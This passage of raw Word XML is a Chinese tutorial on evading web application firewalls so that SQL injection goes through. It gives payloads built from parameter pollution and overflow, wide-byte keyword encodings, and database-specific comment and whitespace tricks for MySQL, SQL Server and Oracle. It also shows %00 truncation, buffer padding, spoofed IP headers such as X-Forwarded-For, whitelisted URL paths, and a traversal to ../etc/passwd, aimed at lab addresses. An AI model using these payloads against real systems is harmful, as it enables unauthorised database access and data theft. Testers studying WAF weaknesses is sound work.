          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无效参数形式：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>?a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=/*&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxx&amp;b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=*/  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>备注：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>a,b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>为无效参数，让</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>waf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>误以为我们输入的语句是在注释符里面执行的所以就不拦截</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>溢出形式：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>?id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">=1/*&amp;id=*//*&amp;id=*//*......&amp;id=*//*&amp;id=*/ union  select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>null,system_user,null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>INFORMATION_SCHEMA.schemata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>?id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=1&amp;id=1&amp;id=1&amp;id=1&amp;id=1&amp;id=1&amp;id=1&amp;id=….. &amp;id=1 union select 1,2 from admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>宽字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宽字节关键字对照表：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>union = uю%69яю这里把</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>不用宽字节 直接</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>编码 其他的字符都用对应的宽字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>select = こ</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>хlх%уt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> //t不编码 其他的都宽字节 中间插上%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t xml:space="preserve">from = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>цR%яэ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> //宽字节+%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>空格</w:t>
      </w:r>
      <w:r>
        <w:t>=%20=%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ва</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> //в是2的款字符 а是0的宽字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>, = Ь //,号的宽字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r w:rsidRPr="003E3886">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库特性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>1、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>技巧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1）</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>注释符有三种</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>：#、/*.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>*/、--  ... (注意--后面有一个空格)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2）空格符:[0x09,0x0a-0x0d,0x20,0xa0]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3）特殊符号：%a 换行符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t xml:space="preserve">   可结合注释符使用%23%0a，%2d%2d%0a。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3）内联注释：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t xml:space="preserve">   /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>*!UnIon</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>12345SelEcT*/ 1,user()   //数字范围 1000-50540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4）</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>黑魔法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>select{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">x username}from {x11 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>test.admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>2、SQL Server技巧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1）用来注释掉注射后查询的其余部分：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t xml:space="preserve">    /*      C语言风格注释</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t xml:space="preserve">    --      SQL注释</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t xml:space="preserve">    ; 00％ 空字节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2）空白符：[0x01-0x20]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3）特殊符号：%3a 冒号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t xml:space="preserve">     id=1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>union:select</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1,2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>from:admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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4）函数变形：如</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[空白字符]()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>3、Oracle技巧</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1）注释符：--、/**/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2）空白字符：[0x00,0x09，0x0a-0x0d,0x20]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>4、更多特性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那些代码层防护，只能用数据库特性来正面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，一般一个</w:t>
      </w:r>
      <w:r>
        <w:t>SQL语句组成包括如下几个位置：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过对常见的</w:t>
      </w:r>
      <w:r>
        <w:t>5个位置进行FUZZ，可以探索更多能够绕过WAF的数据库特性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:hyperlink r:id="rId4" w:anchor="wechat_redirect" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:hint="eastAsia"/>
            <w:spacing w:val="8"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>WAF Bypass数据库特性（Mysql探索篇）</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:hyperlink r:id="rId5" w:anchor="wechat_redirect" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:hint="eastAsia"/>
            <w:spacing w:val="8"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>WAF Bypass数据库特性（MSsql探索篇）</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:hyperlink r:id="rId6" w:anchor="wechat_redirect" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:hint="eastAsia"/>
            <w:spacing w:val="8"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>WAF Bypass数据库特性（Oracle探索篇）</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:hyperlink r:id="rId7" w:anchor="wechat_redirect" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:hint="eastAsia"/>
            <w:spacing w:val="8"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>WAF Bypass数据库特性（Access探索篇）</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>WAF 层</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>1、逻辑问题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1）云</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>waf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>防护，一般我们会尝试通过查找站点的真实IP，从而绕过CDN防护。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2）当提交GET、POST同时请求时，进入POST逻辑，而忽略了GET请求的有害参数输入,可轻易Bypass。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3）HTTP和HTTPS同时开放服务，没有做HTTP到HTTPS的强制跳转，导致HTTPS有WAF防护，HTTP没有防护，直接访问HTTP站点绕过防护。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（</w:t>
      </w:r>
      <w:r>
        <w:t>4）特殊符号%00，部分</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>waf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>遇到%00截断，只能获取到前面的参数，无法获取到后面的有害参数输入，从而导致Bypass。比如：id=1%00and 1=2 union select 1,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>2,column</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">_name from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>2、性能问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>猜想</w:t>
      </w:r>
      <w:r>
        <w:t>1：在设计WAF系统时，考虑自身性能问题，当数据量达到一定层级，不检测这部分数据。只要不断的填充数据，当数据达到一定数目之后，恶意代码就不会被检测了。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猜想</w:t>
      </w:r>
      <w:r>
        <w:t>2：不少WAF是C语言写的，而C语言自身没有缓冲区保护机制，因此如果WAF在处理测试向量时超出了其缓冲区长度就会引发bug，从而实现绕过。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举例</w:t>
      </w:r>
      <w:r>
        <w:t>1：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>?id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=1 and (select 1)=(Select 0xA*1000)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>PS：0xA*1000指0xA后面</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>A"重复1000次，一般来说对应用软件构成缓冲区溢出都需要较大的测试长度，这里1000只做参考也许在有些情况下可能不需要这么长也能溢出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>举例</w:t>
      </w:r>
      <w:r>
        <w:t>2：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>?a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">0=0&amp;a1=1&amp;.....&amp;a100=100&amp;id=1 union select 1,schema_name,3 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>INFORMATION_SCHEMA.schemata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>备注：获取请求参数，只获取前</w:t>
      </w:r>
      <w:r>
        <w:t>100个参数，第101个参数并没有获取到，导致SQL注入绕过。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猜想</w:t>
      </w:r>
      <w:r>
        <w:t>3：多次重复提交同一个请求，有些通过了WAF，有些被WAF所拦截了，性能问题可能导致部分请求bypass。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>3、白名单</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886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IP白名单</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从网络层获取的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，这种一般伪造不来，如果是获取客户端的IP，这样就可能存在伪造IP绕过的情况。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测试方法：修改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">http的header来bypass </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>waf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>X-forwarded-for</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>X-remote-IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>X-originating-IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>x-remote-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>X-Real-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式二：静态资源</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特定的静态资源后缀请求，常见的静态文件</w:t>
      </w:r>
      <w:r>
        <w:t>(.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> .jpg .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>swf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>等等)，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>类似白</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>名单机制，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>waf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>为了检测效率，不去检测这样一些静态文件名后缀的请求。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>http://10.9.9.201/sql.php/1.js?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>备注：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Aspx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>只识别到前面的.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aspx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 后面基本不识别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式三：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>白名单</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了防止误拦，部分</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>waf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>内置默认的白名单列表，如admin/manager/system等管理后台。只要</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>中存在白名单的字符串，就作为白名单不进行检测。常见的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>构造姿势：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>http://10.9.9.201/sql.php/admin.php?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>http://10.9.9.201/sql.php?a=/manage/&amp;b=../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>http://10.9.9.201/../../../manage/../sql.asp?id=2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>waf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>通过/manage/“进行比较，只要</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>中存在/manage/就作为白名单不进行检测，这样我们可以通过/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>php?a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
